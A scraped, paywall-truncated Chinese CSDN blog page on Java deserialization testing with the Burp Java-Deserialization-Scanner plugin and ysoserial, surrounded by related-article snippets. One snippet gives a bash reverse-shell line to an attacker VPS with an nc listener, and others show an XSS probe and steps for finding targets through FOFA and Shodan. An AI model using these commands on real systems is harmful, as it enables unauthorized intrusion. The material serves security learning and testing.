java反序列化漏洞POP查找_Java反序列化漏洞:在受限环境中从漏洞发现到获取反向Shell...

最新推荐文章于 2022-03-14 10:41:09 发布
最新推荐文章于 2022-03-14 10:41:09 发布
阅读量257 收藏
点赞数
文章标签: java反序列化漏洞POP查找
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_33740934/article/details/115086509
版权

433a7c526602a8b01146defb112b02a5.png

启动Burp并安装一个名为Java-Deserialization-Scanner的插件。该插件主要包括2个功能:扫描以及基于ysoserial生成exploit。

5c2328ec5a0ad0925efb844860be94ee.png

扫描远程端点后,Burp插件将向我们返回以下报告内容:

Hibernate 5 (Sleep): Potentially VULNERABLE!!!

是个好消息!

漏洞利用

现在,让我们继续下一步操作。点击exploitation选项卡以实现任意命令执行。

a7127bf18d701f3a6924c1a3bff5e37b.png

从提示信息来看,这个错误应该来自ysoserial。我们回到控制台看看究竟是什么问题。

最低0.47元/天 解锁文章
牡丹一抹红
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
burpsuite插件之Java Deserialization Scanner使用方法1
08-03
1.鼠标邮件发送要测试的反序列化数据到 Manual testing 2.选择测试方式,进行测试 3.假如测试出来了,鼠标右键发送到 exploiting 模块
反序列化漏洞-JAVA
最新发布
acepanhuan的博客
02-22 608
反序列化漏洞-JAVA
metasploit魔鬼训练营_XSS
weixin_34037977的博客
11-11 1207
在owaspbwa环境下进行渗透,总结xss: ubuntu安装xsstrike模糊测试工具.之支持python3环境。XSStrike_模糊测试 Powerful fuzzing engine Context breaking technology Intelligent payload generation GET & POST method suppor...
搬砖笔记-shiro反序列化漏洞
WM_NNXX的博客
07-29 1940
最近经常遇到这个东西。 Apache Shiro是一个Java安全框架,执行身份验证、授权、密码和会话管理。 主要有两个漏洞:Shiro550和Shiro721 Shiro550漏洞原理 Apache Shiro框架提供了记住我的功能(RememberMe),用户登陆成功后会生成经过加密并编码的cookie。cookie的key为RememberMe,cookie的值是经过对相关信息进行序列化,然后使用aes加密,最后在使用base64编码处理形成的。 在服务端接收cookie值时,按照如下步骤来解析处理:
1020.Burp Suite扩展之Java-Deserialization-Scanner
weixin_30408675的博客
01-21 229
Java反序列化漏洞简介 Java序列化就是把对象转换成字节流,便于保存在内存、文件、数据库Java的ObjectOutputStream类的writeObject()方法可以实现序列化。 Java反序列化即逆过程,由字节流还原成对象。ObjectInputStream类的readObject()方法用于反序列化。 因此要利用Java反序列化漏洞,需要在进行反序列化...
Java反序列化漏洞利用工具.zip
04-10
Java反序列化漏洞是软件安全领域的一个重要话题,它涉及到Java应用程序在处理序列化和反序列化过程的安全问题。序列化是将对象状态转换为可存储或传输的数据格式的过程,而反序列化则是将这些数据恢复为原来的对象...
Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查工具CVE-2017-10271
11-11
Java反序列化漏洞是软件安全领域的一个重要话题,特别是在企业级应用服务器如Weblogic,这类漏洞可能导致远程代码执行、系统权限提升等严重后果。工具"Java反序列化漏洞检查工具V1.2_Weblogic XML反序列化漏洞检查...
java反序列化漏洞-验证.rar
06-25
Java反序列化漏洞是软件安全领域的一个重要话题,尤其对于使用Java进行开发的系统来说,理解和防范这种漏洞至关重要。在Java编程,序列化和反序列化是常见的数据传输和持久化手段,允许对象的状态被转换为字节流,...
Java反序列化漏洞利用工具的实现共5页.pdf.zip
11-23
Java反序列化漏洞是软件安全领域的一个重要话题,它源于Java平台的一种设计特性,即对象可以在序列化后存储或在网络上传输,然后通过反序列化恢复为原来的对象状态。这种功能在分布式系统、持久化存储和网络通信...
JAVA及Jackson反序列化漏洞.docx
07-27
Java,`readObject()`方法是反序列化的核心,它会从输入流读取数据并还原对象的状态。在`ObjectInputStream`的源码,`readObject()`会调用`readObject0()`,在这个内部方法,会根据输入流的类型进行不同的...
java反序列化 ysoserial|ysoserial-master-ff59523eb6-1.jar
12-10
帮助理解java反序列化漏洞的工具,一般还需配套工具:SerializationDumper-v1.13、DeserLab以及抓包分析工具
Apache Shiro反序列化远程代码执行复现
浅笑996的博客
06-28 1725
1、寻找目标 首先FOFA找一个环境,检测工具检测一下 发现目标,开干! 2、开启监听 首先在vps运行nc 监听一个端口 nc -lvp 666 列出需要使用的反弹指令 bash -i >& /dev/tcp/129.204.xxx.xxx/666 0>&1 将指令放到http://www.jackson-t.ca/runtime-exec-payloads.html转换成加密后的指令 将指令合成为一个java的监听指令 ...
xss漏洞发现及利用
continue my dream
09-04 7190
漏洞描述:在使用标签(tag)进行浏览时,由于没有很好的过滤用户输入(tag关键字)造成xss跨站漏洞,用户自定义的版块tag搜索和全局tag搜索列表。 利用形式1: http://clin003.com/web2/?u=Club_talk_list&tag=alert(111) 其http://clin003.com/web2/为网站连接,Club_talk_list为用户自定义版块。
6-java安全——java反序列化漏洞利用链
网络安全
07-01 4022
本篇将学习java反序列化漏洞原理,然后结合一个apache commons-collections组件反序列化漏洞来学习如何构造利用链。 我们知道序列化操作主要是由ObjectOutputStream类的 writeObject()方法来完成,反序列化操作主要是由ObjectInputStream类的readObject()方法来完成。当可序列化对象重写了readObject方法后,在反序列化时一般会调用序列化对象的readObject方法。 在Student类重写ObjectInputSt
java反序列化漏洞入门分析
weixin_33896069的博客
09-07 361
参考文献: https://nickbloor.co.uk/2017/08/13/attacking-java-deserialization/amp/https://www.cnblogs.com/ssooking/p/5875215.htmlhttps://xz.aliyun.com/t/2041http...
shiro反序列化漏洞原理和复现
qq_41814777的博客
03-14 1482
shiro反序列化复现
jboss反序列化漏洞实战渗透笔记
weixin_30664615的博客
04-20 320
一.利用shodan,fofa或谷歌搜索关键字:8080/jmx-console/ 二.下载java反序列化终极测试工具进行验证漏洞 三.记住User Current Directory: C:\jboss-6.1.0.marks\ (ps:这是网站的根目录) 四.war文件的部署 JBoss支持热部署,也就是war文件部署到服务器上后不需要重新启动JBoss(Tom...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值